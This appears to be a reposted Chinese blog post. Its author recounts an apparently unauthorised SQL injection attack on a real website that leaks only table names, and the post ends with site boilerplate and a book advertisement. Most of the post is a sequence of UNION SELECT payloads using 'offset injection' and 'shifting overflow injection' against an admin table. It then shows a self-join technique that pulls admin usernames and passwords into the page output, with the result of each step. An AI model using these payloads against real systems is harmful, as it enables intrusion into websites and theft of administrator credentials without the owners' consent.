内容简介:这个灵感是我突然冒出来的,最近有一个只能出来表名的站,一直没的机会实战,正好练习一下偏移注入和移位溢注,顺便总结一下,结果偏移注入成功了,移位溢注倒是不行了,心有不甘(我人品有这么差么?),才有了下文。偏移注入,移位溢注的正常的手法,原理在这里就不写了,描述下站点大概情况,方便大家了解,懂得自然懂。
这个灵感是我突然冒出来的,最近有一个只能出来表名的站,一直没的机会实战,正好练习一下偏移注入和移位溢注,顺便总结一下,结果偏移注入成功了,移位溢注倒是不行了,心有不甘(我人品有这么差么?),才有了下文。
偏移注入,移位溢注的正常的手法,原理在这里就不写了,描述下站点大概情况,方便大家了解,懂得自然懂。
order by 12 - 正常 union select 1,2,3,4,5,6,7,8,* from tbladmin - 正常
显示位
开始移位溢注:
当我使用移位溢注时,遇到了一点小麻烦:
2.1 先测试位置显示位6(失败):
union select 1,2,3,4,5,tbladmin.*,10,11,12 from tbladmin
union select 1,2,3,4,5,tbladmin.*,10,11,12 from tbladmin where id=1 - 返回同上 union select 1,2,3,4,5,tbladmin.*,10,11,12 from tbladmin where id=2 - 发布时间处:1变成了2 ... union select 1,2,3,4,5,tbladmin.*,10,11,12 from tbladmin where id=n - 开始一直返回正常页面了
2.2 然后测试显示位2和3(失败):
union select 1,tbladmin.*,6,7,8,9,10,11,12 from tbladmin - 爆出了一个用户名
union select 1,tbladmin.*,6,7,8,9,10,11,12 from tbladmin where id=1 - 返回内容同上 union select 1,tbladmin.*,6,7,8,9,10,11,12 from tbladmin where id=2 - 如下图,一个新的用户名 ... union select 1,tbladmin.*,6,7,8,9,10,11,12 from tbladmin where id=n - 开始一直返回正常页面了
到了现在,可以发现问题出现了,移位溢注的招式已经用完了,但是显示位明显不够啊,还是爆不出来密码,这样看来,移位溢注还是不能完全和人品说拜拜
联合使用出奇效:
偏移注入的本质是:打乱显示顺序
移位溢注的本质是:占用多处显位
都是为了有一定概率让账号密码出现在显示位上,那么 联合起来 会怎么样呢?下面语句不做分析,还是懂的人自然懂
union select 1,2,3,4,a.*,b.*, * from (tbladmin as a inner join tbladmin as b on a.id=b.id)
union select 1,2,3,4,a.*, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 显示结果同上 union select 1,2,3,a.*,4, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 出现密码了
union select 1,2,a.*,3,4, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 发生变化
union select 1,a.*,2,3,4, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 继续变化
union select a.*,1,2,3,4, * from (tbladmin as a inner join tbladmin as b on a.id=b.id) - 同时显示
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- opencv笔记(2):图像剪切和图像移位
- 记一次Access偏移注入
- ios – reloadRowsAtIndexPaths时保持偏移量
- Kafka 消息偏移量的维护
- Spark Streaming 之 Kafka 偏移量管理
- php-rdkafka手动提交偏移量
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
测出转化率:营销优化的科学与艺术
【美】高尔德(Goward,C.) / 谭磊、唐捷译 / 电子工业出版社 / 2014-10-1 / 68.00元
本书作者通过已成功实现大幅提升转化率的案例,展示了大量以营销为核心的电子商务网站的测试设计方法及转化优化方案。书中作者强调了测试及优化思维的重要性,并就实现方法做了详细讲解。 通过本书,读者将学到如何能够在网站遇到发展和收入瓶颈时,测试出存在的问题并找到解决方案;如何可以深入地了解客户需求,并以此为基础优化网站,使其达到提升转化率的目的;如何提升网站的竞争优势,把在线营销渠道变成高效的转化通......一起来看看 《测出转化率:营销优化的科学与艺术》 这本书的介绍吧!
